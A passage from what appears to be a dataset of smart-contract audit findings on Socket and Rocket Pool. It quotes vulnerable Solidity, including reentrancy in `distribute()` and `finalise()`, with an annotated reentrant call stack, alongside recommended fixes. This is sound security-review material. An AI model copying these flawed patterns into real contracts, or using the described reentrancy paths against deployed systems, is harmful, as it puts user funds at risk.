`d0841a3e96b54a9d837d2dba471aa0946c3c8e7b`, the following bug is still present:\\nTo optimize gas usage, the `addressAt` function in `socketGateway` uses a binary search in a hard-coded table to resolve a `routeID` (routeID <= 512) to a contract address. This is made possible thanks to the factory using the `CREATE2` pattern. This allows to pre-compute future addresses of contracts before they are deployed. In case the `routeID` is strictly greater than 512, `addressAt` falls back to fetching the address from a state mapping (routes).\\nThe new commit hash adds a check to make sure that the call to the `addressAt` function reverts in case a `routeID` is not present in the `routes` mapping. This prevents delegate-calling to non-existent addresses in various places of the code. However, this does not solve the issue for the hard-coded route addresses (i.e., `routeID` <= 512). In that case, the `addressAt` function still returns a valid route contract address, despite the contract not being deployed yet. This will result in a successful `delegatecall` later in the code and might lead to various side-effects.\\n```\\nfunction addressAt(uint32 routeId) public view returns (address) {\\n if (routeId < 513) {\\n if (routeId < 257) {\\n if (routeId < 129) {\\n if (routeId < 65) {\\n if (routeId < 33) {\\n if (routeId < 17) {\\n if (routeId < 9) {\\n if (routeId < 5) {\\n if (routeId < 3) {\\n if (routeId == 1) {\\n return\\n 0x822D4B4e63499a576Ab1cc152B86D1CFFf794F4f;\\n } else {\\n return\\n 0x822D4B4e63499a576Ab1cc152B86D1CFFf794F4f;\\n }\\n } else {\\n```\\n\\n```\\nif (routes[routeId] == address(0)) revert ZeroAddressNotAllowed();\\nreturn routes[routeId];\\n```\\nчConsider adding a check to validate that the callee of a `delegatecall` is indeed a contract, you may refer to the Address library by OZ.чч```\\n(bool success, bytes memory result) = addressAt(routeId).delegatecall(\\n```\\n -Owner Can Add Arbitrary Code to Be Executed From the SocketGateway ContractчmediumчThe Socket system is managed by the `SocketGateway` contract that maintains all routes and controller addresses within its state. There, the address with the `Owner` role of the `SocketGateway` contract can add new routes and controllers that would have a `delegatecall()` executed upon them from the `SocketGateway` so user transactions can go through the logic required for the bridge, swap, or any other solution integrated with Socket. These routes and controllers would then have arbitrary code that is entirely up to the `Owner`, though users are not required to go through any specific routes and can decide which routes to pick.\\nSince these routes are called via `delegatecall()`, they don't hold any storage variables that would be used in the Socket systems. However, as Socket aggregates more solutions, unexpected complexities may arise that could require storing and accessing variables through additional contracts. Those contracts would be access control protected to only have the `SocketGateway` contract have the privileges to modify its variables.\\nThis together with the `Owner` of the `SocketGateway` being able to add routes with arbitrary code creates an attack vector where a compromised address with `Owner` privileges may add a route that would contain code that exploits the special privileges assigned to the `SocketGateway` contract for their benefit.\\nFor example, the Celer bridge needs extra logic to account for its refund mechanism, so there is an additional `CelerStorageWrapper` contract that maintains a mapping between individual bridge transfer transactions and their associated msg.sender:\\n```\\ncelerStorageWrapper.setAddressForTransferId(transferId, msg.sender);\\n```\\n\\n```\\n/\\*\\*\\n \\* @title CelerStorageWrapper\\n \\* @notice handle storageMappings used while bridging ERC20 and native on CelerBridge\\n \\* @dev all functions ehich mutate the storage are restricted to Owner of SocketGateway\\n \\* @author Socket dot tech.\\n \\*/\\ncontract CelerStorageWrapper {\\n```\\n\\nConsequently, this contract has access-protected functions that may only be called by the SocketGateway to set and delete the transfer IDs:\\n```\\nfunction setAddressForTransferId(\\n```\\n\\n```\\nfunction deleteTransferId(bytes32 transferId) external {\\n```\\n\\nA compromised `Owner` of SocketGateway could then create a route that calls into the `CelerStorageWrapper` contract and updates the transfer IDs associated addresses to be under their control via `deleteTransferId()` and `setAddressForTransferId()` functions. This could create a significant drain of user funds, though, it depends on a compromised privileged `Owner` address.чAlthough it may indeed be unlikely, for aggregating solutions it is especially important to try and minimize compromised access issues. As future solutions require more complexity, consider architecting their integrations in such a way that they require as few administrative and SocketGateway-initiated transactions as possible. Through conversations with the Socket team, it appears that solutions such as timelocks on adding new routes are being considered as well, which would help catch the problem before it appears as well.чч```\\ncelerStorageWrapper.setAddressForTransferId(transferId, msg.sender);\\n```\\n -Dependency on Third-Party APIs to Create the Right PayloadчmediumчThe Socket system of routes and controllers integrates swaps, bridges, and potentially other solutions that are vastly different from each other. The function arguments that are required to execute them may often seem like a black box of a payload for a typical end user. In fact, even when users explicitly provide a destination `token` with an associated `amount` for a swap, these arguments themselves might not even be fully (or at all) used in the route itself. Instead, often the routes and controllers accept a `bytes` payload that contains all the necessary data for its action. These data payloads are generated off-chain, often via centralized APIs provided by the integrated systems themselves, which is understandable in isolation as they have to be generated somewhere at some point. However, the provided `bytes` do not get checked for their correctness or matching with the other arguments that the user explicitly provided. Even the events that get emitted refer to the individual arguments of functions as opposed to what actually was being used to execute the logic.\\nFor example, the implementation route for the 1inch swaps explicitly asks the user to provide `fromToken`, `toToken`, `amount`, and `receiverAddress`, however only `fromToken` and `amount` are used meaningfully to transfer the `amount` to the SocketGateway and approve the `fromToken` to be spent by the 1inch contract. Everything else is dictated by `swapExtraData`, including even the true `amount` that is getting swapped. A mishap in the API providing this data payload could cause much less of a token `amount` to be swapped, a wrong address to receive the swap, and even the wrong destination token to return.\\n```\\n// additional data is generated in off-chain using the OneInch API which takes in\\n// fromTokenAddress, toTokenAddress, amount, fromAddress, slippage, destReceiver, disableEstimate\\n(bool success, bytes memory result) = ONEINCH\\_AGGREGATOR.call(\\n swapExtraData\\n);\\n```\\n\\nEven the event at the end of the transaction partially refers to the explicitly provided arguments instead of those that actually facilitated the execution of logic\\n```\\nemit SocketSwapTokens(\\n fromToken,\\n toToken,\\n returnAmount,\\n amount,\\n OneInchIdentifier,\\n receiverAddress\\n);\\n```\\n\\nAs Socket aggregates other solutions, it naturally incurs the trust assumptions and risks associated with its integrations. In some ways, they even stack on top of each other, especially in those Socket functions that batch several routes together - all of them and their associated API calls need to return the correct payloads. So, there is an opportunity to minimize these risks by introducing additional checks into the contracts that would verify the correctness of the payloads that are passed over to the routes and controllers. In fact, creating these payloads within the contracts would allow other systems to integrate Socket more simpler as they could just call the functions with primary logical arguments such as the source token, destination token, and amount.чConsider allocating additional checks within the route implementations that ensure that the explicitly passed arguments match what is being sent for execution to the integrated solutions, like in the above example with the 1inch implementation.чч```\\n// additional data is generated in off-chain using the OneInch API which takes in\\n// fromTokenAddress, toTokenAddress, amount, fromAddress, slippage, destReceiver, disableEstimate\\n(bool success, bytes memory result) = ONEINCH\\_AGGREGATOR.call(\\n swapExtraData\\n);\\n```\\n -NativeOptimismImpl - Events Will Not Be Emitted in Case of Non-Native Tokens BridgingчmediumчIn the case of the usage of non-native tokens by users, the `SocketBridge` event will not be emitted since the code will return early.\\n```\\nfunction bridgeAfterSwap(\\n```\\n\\n```\\nfunction swapAndBridge(\\n```\\n\\n```\\nfunction bridgeERC20To(\\n```\\nчMake sure that the `SocketBridge` event is emitted for non-native tokens as well.чч```\\nfunction bridgeAfterSwap(\\n```\\n -Inconsistent CommentsчlowчSome of the contracts in the code have incorrect developer comments annotated for them. This could create confusion for future readers of this code that may be trying to maintain, audit, update, fork, integrate it, and so on.\\n```\\n/\\*\\*\\n \\* @notice function to bridge tokens after swap. This is used after swap function call\\n \\* @notice This method is payable because the caller is doing token transfer and briding operation\\n \\* @dev for usage, refer to controller implementations\\n \\* encodedData for bridge should follow the sequence of properties in Stargate-BridgeData struct\\n \\* @param swapId routeId for the swapImpl\\n \\* @param swapData encoded data for swap\\n \\* @param stargateBridgeData encoded data for StargateBridgeData\\n \\*/\\nfunction swapAndBridge(\\n```\\n\\nThis is the same comment as `bridgeAfterSwap`, whereas it instead does swapping and bridging together\\n```\\n/\\*\\*\\n \\* @notice function to store the transferId and message-sender of a bridging activity\\n \\* @notice This method is payable because the caller is doing token transfer and briding operation\\n \\* @dev for usage, refer to controller implementations\\n \\* encodedData for bridge should follow the sequence of properties in CelerBridgeData struct\\n \\* @param transferId transferId generated during the bridging of ERC20 or native on CelerBridge\\n \\* @param transferIdAddress message sender who is making the bridging on CelerBridge\\n \\*/\\nfunction setAddressForTransferId(\\n```\\n\\nThis comment refers to a payable property of this function when it isn't.\\n```\\n/\\*\\*\\n \\* @notice function to store the transferId and message-sender of a bridging activity\\n \\* @notice This method is payable because the caller is doing token transfer and briding operation\\n \\* @dev for usage, refer to controller implementations\\n \\* encodedData for bridge should follow the sequence of properties in CelerBridgeData struct\\n \\* @param transferId transferId generated during the bridging of ERC20 or native on CelerBridge\\n \\*/\\nfunction deleteTransferId(bytes32 transferId) external {\\n```\\n\\nThis comment is copied from the above function when it does the opposite of storing - it deletes the `transferId`чAdjust comments so they reflect what the functions are actually doing.чч```\\n/\\*\\*\\n \\* @notice function to bridge tokens after swap. This is used after swap function call\\n \\* @notice This method is payable because the caller is doing token transfer and briding operation\\n \\* @dev for usage, refer to controller implementations\\n \\* encodedData for bridge should follow the sequence of properties in Stargate-BridgeData struct\\n \\* @param swapId routeId for the swapImpl\\n \\* @param swapData encoded data for swap\\n \\* @param stargateBridgeData encoded data for StargateBridgeData\\n \\*/\\nfunction swapAndBridge(\\n```\\n -Unused Error Codes.чlowч`error RouteAlreadyExist();`\\n`error ContractContainsNoCode();`\\n`error ControllerAlreadyExist();`\\n`error ControllerAddressIsZero();`\\nIt seems that they were created as errors that may have been expected to occur during the early stages of development, but the resulting architecture doesn't seem to have a place for them currently.\\n```\\nerror RouteAlreadyExist();\\nerror SwapFailed();\\nerror UnsupportedInterfaceId();\\nerror ContractContainsNoCode();\\nerror InvalidCelerRefund();\\nerror CelerAlreadyRefunded();\\nerror ControllerAlreadyExist();\\nerror ControllerAddressIsZero();\\n```\\nчResolution\\nRemediated as per the client team in SocketDotTech/socket-ll-contracts#148.\\nConsider revisiting these errors and identifying whether they need to remain or can be removed.чч```\\nerror RouteAlreadyExist();\\nerror SwapFailed();\\nerror UnsupportedInterfaceId();\\nerror ContractContainsNoCode();\\nerror InvalidCelerRefund();\\nerror CelerAlreadyRefunded();\\nerror ControllerAlreadyExist();\\nerror ControllerAddressIsZero();\\n```\\n -Inaccurate Interface.чlowч`ISocketGateway` implies a `bridge(uint32 routeId, bytes memory data)` function, but there is no socket contract with a function like that, including the `SocketGateway` contract.\\n```\\nfunction bridge(\\n uint32 routeId,\\n bytes memory data\\n) external payable returns (bytes memory);\\n```\\nчAdjust the interface.чч```\\nfunction bridge(\\n uint32 routeId,\\n bytes memory data\\n) external payable returns (bytes memory);\\n```\\n -Validate Array Length Matching Before Execution to Avoid RevertsчlowчThe Socket system not only aggregates different solutions via its routes and controllers but also allows to batch calls between them into one transaction. For example, a user may call swaps between several DEXs and then perform a bridge transfer.\\nAs a result, the `SocketGateway` contract has many functions that accept multiple arrays that contain the necessary data for execution in their respective routes. However, these arrays need to be of the same length because individual elements in the arrays are intended to be matched at the same indices:\\n```\\nfunction executeRoutes(\\n uint32[] calldata routeIds,\\n bytes[] calldata dataItems,\\n bytes[] calldata eventDataItems\\n) external payable {\\n uint256 routeIdslength = routeIds.length;\\n for (uint256 index = 0; index < routeIdslength; ) {\\n (bool success, bytes memory result) = addressAt(routeIds[index])\\n .delegatecall(dataItems[index]);\\n\\n if (!success) {\\n assembly {\\n revert(add(result, 32), mload(result))\\n }\\n }\\n\\n emit SocketRouteExecuted(routeIds[index], eventDataItems[index]);\\n\\n unchecked {\\n ++index;\\n }\\n }\\n}\\n```\\n\\nNote that in the above example function, all 3 different calldata arrays `routeIds`, `dataItems`, and `eventDataItems` were utilizing the same `index` to retrieve the correct element. A common practice in such cases is to confirm that the sizes of the arrays match before continuing with the execution of the rest of the transaction to avoid costly reverts that could happen due to “Index out of bounds” error.\\nDue to the aggregating and batching nature of the Socket system that may have its users rely on 3rd party offchain APIs to construct these array payloads, such as from APIs of the systems that Socket is integrating, a mishap in just any one of them could cause this issue.чImplement a check on the array lengths so they match.чч```\\nfunction executeRoutes(\\n uint32[] calldata routeIds,\\n bytes[] calldata dataItems,\\n bytes[] calldata eventDataItems\\n) external payable {\\n uint256 routeIdslength = routeIds.length;\\n for (uint256 index = 0; index < routeIdslength; ) {\\n (bool success, bytes memory result) = addressAt(routeIds[index])\\n .delegatecall(dataItems[index]);\\n\\n if (!success) {\\n assembly {\\n revert(add(result, 32), mload(result))\\n }\\n }\\n\\n emit SocketRouteExecuted(routeIds[index], eventDataItems[index]);\\n\\n unchecked {\\n ++index;\\n }\\n }\\n}\\n```\\n -Destroyed Routes Eth Balances Will Be Left Locked in SocketDeployFactoryчlowч`SocketDeployFactory.destroy` calls the `killme` function which in turn self-destructs the route and sends back any eth to the factory contract. However, these funds can not be claimed from the `SocketDeployFactory` contract.\\n```\\nfunction destroy(uint256 routeId) external onlyDisabler {\\n```\\nчMake sure that these funds can be claimed.чч```\\nfunction destroy(uint256 routeId) external onlyDisabler {\\n```\\n -RocketNodeDistributorDelegate - Reentrancy in distribute() allows node owner to drain distributor fundsчhighчThe `distribute()` function distributes the contract's balance between the node operator and the user. The node operator is returned their initial collateral, including a fee. The rest is returned to the RETH token contract as user collateral.\\nAfter determining the node owner's share, the contract transfers `ETH` to the node withdrawal address, which can be the configured withdrawal address or the node address. Both addresses may potentially be a malicious contract that recursively calls back into the `distribute()` function to retrieve the node share multiple times until all funds are drained from the contract. The `distribute()` function is not protected against reentrancy:\\n```\\n/// @notice Distributes the balance of this contract to its owners\\nfunction distribute() override external {\\n // Calculate node share\\n uint256 nodeShare = getNodeShare();\\n // Transfer node share\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n (bool success,) = withdrawalAddress.call{value : nodeShare}(\"\");\\n require(success);\\n // Transfer user share\\n uint256 userShare = address(this).balance;\\n address rocketTokenRETH = rocketStorage.getAddress(rocketTokenRETHKey);\\n payable(rocketTokenRETH).transfer(userShare);\\n // Emit event\\n emit FeesDistributed(nodeAddress, userShare, nodeShare, block.timestamp);\\n}\\n```\\n\\nWe also noticed that any address could set a withdrawal address as there is no check for the caller to be a registered node. In fact, the caller can be the withdrawal address or node operator.\\n```\\n// Set a node's withdrawal address\\nfunction setWithdrawalAddress(address \\_nodeAddress, address \\_newWithdrawalAddress, bool \\_confirm) external override {\\n // Check new withdrawal address\\n require(\\_newWithdrawalAddress != address(0x0), \"Invalid withdrawal address\");\\n // Confirm the transaction is from the node's current withdrawal address\\n address withdrawalAddress = getNodeWithdrawalAddress(\\_nodeAddress);\\n require(withdrawalAddress == msg.sender, \"Only a tx from a node's withdrawal address can update it\");\\n // Update immediately if confirmed\\n if (\\_confirm) {\\n updateWithdrawalAddress(\\_nodeAddress, \\_newWithdrawalAddress);\\n }\\n // Set pending withdrawal address if not confirmed\\n else {\\n pendingWithdrawalAddresses[\\_nodeAddress] = \\_newWithdrawalAddress;\\n }\\n}\\n```\\nчResolution\\nFixed in https://github.com/rocket-pool/rocketpool/tree/77d7cca65b7c0557cfda078a4fc45f9ac0cc6cc6 by implementing a custom reentrancy guard via a new state variable `lock` that is appended to the end of the storage layout. The reentrancy guard is functionally equivalent to the OpenZeppelin implementation. The method was not refactored to give user funds priority over the node share. Additionally, the client provided the following statement:\\nWe acknowledge this as a critical issue and have solved with a reentrancy guard.\\nWe followed OpenZeppelin's design for a reentrancy guard. We were unable to use it directly as it is hardcoded to use storage slot 0 and because we already have deployment of this delegate in the wild already using storage slot 0 for another purpose, we had to append it to the end of the existing storage layout.\\nAdd a reentrancy guard to functions that interact with untrusted contracts. Adhere to the checks-effects pattern and send user funds to the ‘trusted' RETH contract first. Only then send funds to the node's withdrawal address.чч```\\n/// @notice Distributes the balance of this contract to its owners\\nfunction distribute() override external {\\n // Calculate node share\\n uint256 nodeShare = getNodeShare();\\n // Transfer node share\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n (bool success,) = withdrawalAddress.call{value : nodeShare}(\"\");\\n require(success);\\n // Transfer user share\\n uint256 userShare = address(this).balance;\\n address rocketTokenRETH = rocketStorage.getAddress(rocketTokenRETHKey);\\n payable(rocketTokenRETH).transfer(userShare);\\n // Emit event\\n emit FeesDistributed(nodeAddress, userShare, nodeShare, block.timestamp);\\n}\\n```\\n -RocketMinipoolDelegateOld - Node operator may reenter finalise() to manipulate accountingчhighчIn the old Minipool delegate contract, a node operator may call the `finalise()` function to finalize a Minipool. As part of this process, a call to `_refund()` may be performed if there is a node refund balance to be transferred. This will send an amount of `nodeRefundBalance` in ETH to the `nodeWithdrawalAddress` via a low-level call, handing over control flow to an - in terms of the system - untrusted external account that this node operator controls. The node operator, therefore, is granted to opportunity to call back into `finalise()`, which is not protected against reentrancy and violates the checks-effects-interactions pattern (finalised = true is only set at the very end), to manipulate the following system settings:\\nnode.minipools.finalised.count: NodeAddress finalised count increased twice instead\\nminipools.finalised.count: global finalised count increased twice\\n`eth.matched.node.amount` - NodeAddress eth matched amount potentially reduced too many times; has an impact on `getNodeETHCollateralisationRatio -> GetNodeShare`, `getNodeETHProvided -> getNodeEffectiveRPLStake` and `getNodeETHProvided->getNodeMaximumRPLStake->withdrawRPL` and is the limiting factor when withdrawing RPL to ensure the pools stay collateralized.\\nNote: `RocketMinipoolDelegateOld` is assumed to be the currently deployed MiniPool implementation. Users may upgrade from this delegate to the new version and can roll back at any time and re-upgrade, even within the same transaction (see issue 5.3 ).\\nThe following is an annotated call stack from a node operator calling `minipool.finalise()` reentering `finalise()` once more on their Minipool:\\n```\\nfinalise() --> \\n status == MinipoolStatus.Withdrawable //<-- true\\n withdrawalBlock > 0 //<-- true\\n _finalise() -->\\n !finalised //<-- true\\n _refund()\\n nodeRefundBalance = 0 //<-- reset refund balance\\n ---> extCall: nodeWithdrawalAddress\\n ---> reenter: finalise()\\n status == MinipoolStatus.Withdrawable //<-- true\\n withdrawalBlock > 0 //<-- true\\n _finalise() -->\\n !finalised //<-- true\\n nodeRefundBalance > 0 //<-- false; no refund()\\n address(this).balance to RETH\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral()\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress) //<-- 1st time\\n eventually call rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress); \\n finalised = true;\\n <--- return from reentrant call\\n <--- return from _refund()\\n address(this).balance to RETH //<-- NOP as balance was sent to RETH already\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral(); //<-- does not revert\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress); //<-- no revert, increases\\n 'node.minipools.finalised.count', 'minipools.finalised.count', reduces 'eth.matched.node.amount' one to\\n many times\\n eventually call rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress); //<-- manipulates\\n 'member.validator.unbonded.count' by +1\\n finalised = true; //<-- is already 'true', gracefully continues\\n<--- returns \\n```\\n\\n```\\n// Called by node operator to finalise the pool and unlock their RPL stake\\nfunction finalise() external override onlyInitialised onlyMinipoolOwnerOrWithdrawalAddress(msg.sender) {\\n // Can only call if withdrawable and can only be called once\\n require(status == MinipoolStatus.Withdrawable, \"Minipool must be withdrawable\");\\n // Node operator cannot finalise the pool unless distributeBalance has been called\\n require(withdrawalBlock > 0, \"Minipool balance must have been distributed at least once\");\\n // Finalise the pool\\n \\_finalise();\\n}\\n```\\n\\n`_refund()` handing over control flow to `nodeWithdrawalAddress`\\n```\\n// Perform any slashings, refunds, and unlock NO's stake\\nfunction \\_finalise() private {\\n // Get contracts\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(\"rocketMinipoolManager\"));\\n // Can only finalise the pool once\\n require(!finalised, \"Minipool has already been finalised\");\\n // If slash is required then perform it\\n if (nodeSlashBalance > 0) {\\n \\_slash();\\n }\\n // Refund node operator if required\\n if (nodeRefundBalance > 0) {\\n \\_refund();\\n }\\n // Send any left over ETH to rETH contract\\n if (address(this).balance > 0) {\\n // Send user amount to rETH contract\\n payable(rocketTokenRETH).transfer(address(this).balance);\\n }\\n // Trigger a deposit of excess collateral from rETH contract to deposit pool\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral();\\n // Unlock node operator's RPL\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress);\\n // Update unbonded validator count if minipool is unbonded\\n if (depositType == MinipoolDeposit.Empty) {\\n RocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\n rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress);\\n }\\n // Set finalised flag\\n finalised = true;\\n}\\n```\\n\\n```\\nfunction \\_refund() private {\\n // Update refund balance\\n uint256 refundAmount = nodeRefundBalance;\\n nodeRefundBalance = 0;\\n // Get node withdrawal address\\n address nodeWithdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n // Transfer refund amount\\n (bool success,) = nodeWithdrawalAddress.call{value : refundAmount}(\"\");\\n require(success, \"ETH refund amount was not successfully transferred to node operator\");\\n // Emit ether withdrawn event\\n emit EtherWithdrawn(nodeWithdrawalAddress, refundAmount, block.timestamp);\\n}\\n```\\n\\nMethods adjusting system settings called twice:\\n```\\n// Increments \\_nodeAddress' number of minipools that have been finalised\\nfunction incrementNodeFinalisedMinipoolCount(address \\_nodeAddress) override external onlyLatestContract(\"rocketMinipoolManager\", address(this)) onlyRegisteredMinipool(msg.sender) {\\n // Update the node specific count\\n addUint(keccak256(abi.encodePacked(\"node.minipools.finalised.count\", \\_nodeAddress)), 1);\\n // Update the total count\\n addUint(keccak256(bytes(\"minipools.finalised.count\")), 1);\\n}\\n```\\n\\n```\\n}\\nfunction decrementMemberUnbondedValidatorCount(address \\_nodeAddress) override external onlyLatestContract(\"rocketDAONodeTrusted\", address(this)) onlyRegisteredMinipool(msg.sender) {\\n subUint(keccak256(abi.encodePacked(daoNameSpace, \"member.validator.unbonded.count\", \\_nodeAddress)), 1);\\n}\\n```\\nчWe recommend setting the `finalised = true` flag immediately after checking for it. Additionally, the function flow should adhere to the checks-effects-interactions pattern whenever possible. We recommend adding generic reentrancy protection whenever the control flow is handed to an untrusted entity.��ч```\\nfinalise() --> \\n status == MinipoolStatus.Withdrawable //<-- true\\n withdrawalBlock > 0 //<-- true\\n _finalise() -->\\n !finalised //<-- true\\n _refund()\\n nodeRefundBalance = 0 //<-- reset refund balance\\n ---> extCall: nodeWithdrawalAddress\\n ---> reenter: finalise()\\n status == MinipoolStatus.Withdrawable //<-- true\\n withdrawalBlock > 0 //<-- true\\n _finalise() -->\\n !finalised //<-- true\\n nodeRefundBalance > 0 //<-- false; no refund()\\n address(this).balance to RETH\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral()\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress) //<-- 1st time\\n eventually call rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress); \\n finalised = true;\\n <--- return from reentrant call\\n <--- return from _refund()\\n address(this).balance to RETH //<-- NOP as balance was sent to RETH already\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral(); //<-- does not revert\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress); //<-- no revert, increases\\n 'node.minipools.finalised.count', 'minipools.finalised.count', reduces 'eth.matched.node.amount' one to\\n many times\\n eventually call rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress); //<-- manipulates\\n 'member.validator.unbonded.count' by +1\\n finalised = true; //<-- is already 'true', gracefully continues\\n<--- returns \\n```\\n -RocketMinipoolDelegate - Sandwiching of Minipool calls can have unintended side effectsчhighчThe `RocketMinipoolBase` contract exposes the functions `delegateUpgrade` and `delegateRollback`, allowing the minipool owner to switch between delegate implementations. While giving the minipool owner a chance to roll back potentially malfunctioning upgrades, the fact that upgrades and rollback are instantaneous also gives them a chance to alternate between executing old and new code (e.g. by utilizing callbacks) and sandwich user calls to the minipool.\\nAssuming the latest minipool delegate implementation, any user can call `RocketMinipoolDelegate.slash`, which slashes the node operator's RPL balance if a slashing has been recorded on their validator. To mark the minipool as having been `slashed`, the `slashed` contract variable is set to `true`. A minipool owner can avoid this flag from being set By sandwiching the user calls:\\nIn detail, the new slash implementation:\\n```\\nfunction \\_slash() private {\\n // Get contracts\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(\"rocketNodeStaking\"));\\n // Slash required amount and reset storage value\\n uint256 slashAmount = nodeSlashBalance;\\n nodeSlashBalance = 0;\\n rocketNodeStaking.slashRPL(nodeAddress, slashAmount);\\n // Record slashing\\n slashed = true;\\n}\\n```\\n\\nCompared to the old slash implementation:\\n```\\nfunction \\_slash() private {\\n // Get contracts\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(\"rocketNodeStaking\"));\\n // Slash required amount and reset storage value\\n uint256 slashAmount = nodeSlashBalance;\\n nodeSlashBalance = 0;\\n rocketNodeStaking.slashRPL(nodeAddress, slashAmount);\\n}\\n```\\n\\nWhile the bypass of `slashed` being set is a benign example, the effects of this issue, in general, could result in a significant disruption of minipool operations and potentially affect the system's funds. The impact highly depends on the changes introduced by future minipool upgrades.чWe recommend limiting upgrades and rollbacks to prevent minipool owners from switching implementations with an immediate effect. A time lock can fulfill this purpose when a minipool owner announces an upgrade to be done at a specific block. A warning can precede user-made calls that an upgrade is pending, and their interaction can have unintended side effects.чч```\\nfunction \\_slash() private {\\n // Get contracts\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(\"rocketNodeStaking\"));\\n // Slash required amount and reset storage value\\n uint256 slashAmount = nodeSlashBalance;\\n nodeSlashBalance = 0;\\n rocketNodeStaking.slashRPL(nodeAddress, slashAmount);\\n // Record slashing\\n slashed = true;\\n}\\n```\\n -RocketDAONodeTrustedActions - No way to access ETH provided by non-member votes AcknowledgedчhighчDAO members can challenge nodes to prove liveliness for free. Non-DAO members must provide `members.challenge.cost = 1 eth` to start a challenge. However, the provided challenge cost is locked within the contract instead of being returned or recycled as system collateral.\\n```\\n// In the event that the majority/all of members go offline permanently and no more proposals could be passed, a current member or a regular node can 'challenge' a DAO members node to respond\\n// If it does not respond in the given window, it can be removed as a member. The one who removes the member after the challenge isn't met, must be another node other than the proposer to provide some oversight\\n// This should only be used in an emergency situation to recover the DAO. Members that need removing when consensus is still viable, should be done via the 'kick' method.\\nfunction actionChallengeMake(address \\_nodeAddress) override external onlyTrustedNode(\\_nodeAddress) onlyRegisteredNode(msg.sender) onlyLatestContract(\"rocketDAONodeTrustedActions\", address(this)) payable {\\n // Load contracts\\n RocketDAONodeTrustedInterface rocketDAONode = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\n RocketDAONodeTrustedSettingsMembersInterface rocketDAONodeTrustedSettingsMembers = RocketDAONodeTrustedSettingsMembersInterface(getContractAddress(\"rocketDAONodeTrustedSettingsMembers\"));\\n // Members can challenge other members for free, but for a regular bonded node to challenge a DAO member, requires non-refundable payment to prevent spamming\\n if(rocketDAONode.getMemberIsValid(msg.sender) != true) require(msg.value == rocketDAONodeTrustedSettingsMembers.getChallengeCost(), \"Non DAO members must pay ETH to challenge a members node\");\\n // Can't challenge yourself duh\\n require(msg.sender != \\_nodeAddress, \"You cannot challenge yourself\");\\n // Is this member already being challenged?\\n```\\nчWe recommend locking the ETH inside the contract during the challenge process. If a challenge is refuted, we recommend feeding the locked value back into the system as protocol collateral. If the challenge succeeds and the node is kicked, it is assumed that the challenger will be repaid the amount they had to lock up to prove non-liveliness.чч```\\n// In the event that the majority/all of members go offline permanently and no more proposals could be passed, a current member or a regular node can 'challenge' a DAO members node to respond\\n// If it does not respond in the given window, it can be removed as a member. The one who removes the member after the challenge isn't met, must be another node other than the proposer to provide some oversight\\n// This should only be used in an emergency situation to recover the DAO. Members that need removing when consensus is still viable, should be done via the 'kick' method.\\nfunction actionChallengeMake(address \\_nodeAddress) override external onlyTrustedNode(\\_nodeAddress) onlyRegisteredNode(msg.sender) onlyLatestContract(\"rocketDAONodeTrustedActions\", address(this)) payable {\\n // Load contracts\\n RocketDAONodeTrustedInterface rocketDAONode = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\n RocketDAONodeTrustedSettingsMembersInterface rocketDAONodeTrustedSettingsMembers = RocketDAONodeTrustedSettingsMembersInterface(getContractAddress(\"rocketDAONodeTrustedSettingsMembers\"));\\n // Members can challenge other members for free, but for a regular bonded node to challenge a DAO member, requires non-refundable payment to prevent spamming\\n if(rocketDAONode.getMemberIsValid(msg.sender) != true) require(msg.value == rocketDAONodeTrustedSettingsMembers.getChallengeCost(), \"Non DAO members must pay ETH to challenge a members node\");\\n // Can't challenge yourself duh\\n require(msg.sender != \\_nodeAddress, \"You cannot challenge yourself\");\\n // Is this member already being challenged?\\n```\\n -Multiple checks-effects violationsчhighчThroughout the system, there are various violations of the checks-effects-interactions pattern where the contract state is updated after an external call. Since large parts of the Rocket Pool system's smart contracts are not guarded against reentrancy, the external call's recipient may reenter and potentially perform malicious actions that can impact the overall accounting and, thus, system funds.\\n`distributeToOwner()` sends the contract's balance to the node or the withdrawal address before clearing the internal accounting:\\n```\\n/// @notice Withdraw node balances from the minipool and close it. Only accepts calls from the owner\\nfunction close() override external onlyMinipoolOwner(msg.sender) onlyInitialised {\\n // Check current status\\n require(status == MinipoolStatus.Dissolved, \"The minipool can only be closed while dissolved\");\\n // Distribute funds to owner\\n distributeToOwner();\\n // Destroy minipool\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(\"rocketMinipoolManager\"));\\n require(rocketMinipoolManager.getMinipoolExists(address(this)), \"Minipool already closed\");\\n rocketMinipoolManager.destroyMinipool();\\n // Clear state\\n nodeDepositBalance = 0;\\n nodeRefundBalance = 0;\\n userDepositBalance = 0;\\n userDepositBalanceLegacy = 0;\\n userDepositAssignedTime = 0;\\n}\\n```\\n\\nThe withdrawal block should be set before any other contracts are called:\\n```\\n// Save block to 